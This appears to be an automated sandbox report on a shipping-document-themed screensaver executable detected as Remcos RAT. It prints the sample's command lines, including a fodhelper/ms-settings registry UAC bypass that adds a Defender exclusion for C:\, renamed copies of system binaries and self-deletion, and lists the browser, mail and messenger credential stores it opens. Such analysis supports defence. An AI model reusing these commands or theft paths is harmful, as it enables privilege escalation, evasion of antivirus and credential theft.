Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Uses taskkill to terminate processes

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114355115.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114355115.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerD
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114261352.0000000027502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_40102933 cpuid

0_2_40102933

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27991F9B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27991F50
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_27992610
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,	0_2_27992543
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_27991CD8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27988404
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_2799243C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,	0_2_27992313
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,	0_2_279888ED
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27992036
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoA,	0_2_2794F8D1
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	5_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	5_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	5_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	6_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	6_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	6_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	9_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	9_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	9_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	31_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	31_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	31_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	32_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	32_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	32_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	34_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	34_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	34_2_00007FF70CC76EE4

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_40102264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_40102264

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795B60D GetComputerNameExW,GetUserNameW,

0_2_2795B60D

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_279893AD

Source: C:\Users\Public\Libraries\glrkszlG.pif

Code function: 1_2_0040559A GetVersionExW,GetVersionExW,

1_2_0040559A

Source: C:\Users\Public\xkn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Opens network shares

Source: C:\Users\Public\alpha.exe

File opened: \\Windows \

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: ESMTPPassword	37_2_004033F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	37_2_00402DB3
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	37_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7492, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Windows Analysis Report
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

